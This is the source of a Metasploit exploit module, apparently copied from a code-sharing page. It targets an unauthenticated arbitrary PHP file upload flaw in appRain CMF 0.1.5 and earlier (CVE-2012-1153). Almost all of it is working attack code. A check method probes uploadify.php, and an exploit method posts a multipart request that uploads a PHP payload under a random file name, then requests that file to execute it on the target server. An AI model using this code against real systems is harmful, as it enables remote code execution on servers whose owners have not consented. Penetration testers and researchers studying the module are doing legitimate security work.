Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info={})
12
    super(update_info(info,
13
      'Name'           => "appRain CMF Arbitrary PHP File Upload Vulnerability",
14
      'Description'    => %q{
15
          This module exploits a vulnerability found in appRain's Content Management
16
        Framework (CMF), version 0.1.5 or less.  By abusing the uploadify.php file, a
17
        malicious user can upload a file to the uploads/ directory without any
18
        authentication, which results in arbitrary code execution.
19
      },
20
      'License'        => MSF_LICENSE,
21
      'Author'         =>
22
        [
23
          'EgiX',   #Discovery, PoC
24
          'sinn3r'  #Metasploit
25
        ],
26
      'References'     =>
27
        [
28
          ['CVE', '2012-1153'],
29
          ['OSVDB', '78473'],
30
          ['EDB', '18392'],
31
          ['BID', '51576']
32
        ],
33
      'Payload'        =>
34
        {
35
          'BadChars' => "\x00"
36
        },
37
      'DefaultOptions'  =>
38
        {
39
          'EXITFUNC' => 'thread'
40
        },
41
      'Platform'       => ['php'],
42
      'Arch'           => ARCH_PHP,
43
      'Targets'        =>
44
        [
45
          ['appRain 0.1.5 or less', {}]
46
        ],
47
      'Privileged'     => false,
48
      'DisclosureDate' => '2012-01-19',
49
      'DefaultTarget'  => 0))
50

51
      register_options(
52
        [
53
          OptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])
54
        ])
55
  end
56

57
  def check
58
    uri = target_uri.path
59
    uri << '/' if uri[-1,1] != '/'
60

61
    res = send_request_cgi({
62
      'method' => 'GET',
63
      'uri'    => normalize_uri(uri, 'addons/uploadify/uploadify.php')
64
    })
65

66
    if res and res.code == 200 and res.body.empty?
67
      return Exploit::CheckCode::Appears
68
    else
69
      return Exploit::CheckCode::Safe
70
    end
71
  end
72

73
  def exploit
74
    uri = target_uri.path
75

76
    peer = "#{rhost}:#{rport}"
77
    payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'
78

79
    post_data = "--o0oOo0o\r\n"
80
    post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"
81
    post_data << "<?php "
82
    post_data << payload.encoded
83
    post_data << " ?>\r\n"
84
    post_data << "--o0oOo0o\r\n"
85

86
    print_status("Sending PHP payload (#{payload_name})")
87
    res = send_request_cgi({
88
      'method' => 'POST',
89
      'uri'    => normalize_uri(uri, "addons/uploadify/uploadify.php"),
90
      'ctype'  => 'multipart/form-data; boundary=o0oOo0o',
91
      'data'   => post_data
92
    })
93

94
    # If the server returns 200 and the body contains our payload name,
95
    # we assume we uploaded the malicious file successfully
96
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
97
      print_error("File wasn't uploaded, aborting!")
98
      return
99
    end
100

101
    print_status("Executing PHP payload (#{payload_name})")
102
    # Execute our payload
103
    res = send_request_cgi({
104
      'method' => 'GET',
105
      'uri'    => normalize_uri(uri, "addons/uploadify/uploads/#{payload_name}")
106
    })
107

108
    # If we don't get a 200 when we request our malicious payload, we suspect
109
    # we don't have a shell, either.  Print the status code for debugging purposes.
110
    if res and res.code != 200
111
      print_status("Server returned #{res.code.to_s}")
112
    end
113
  end
114
end
115

116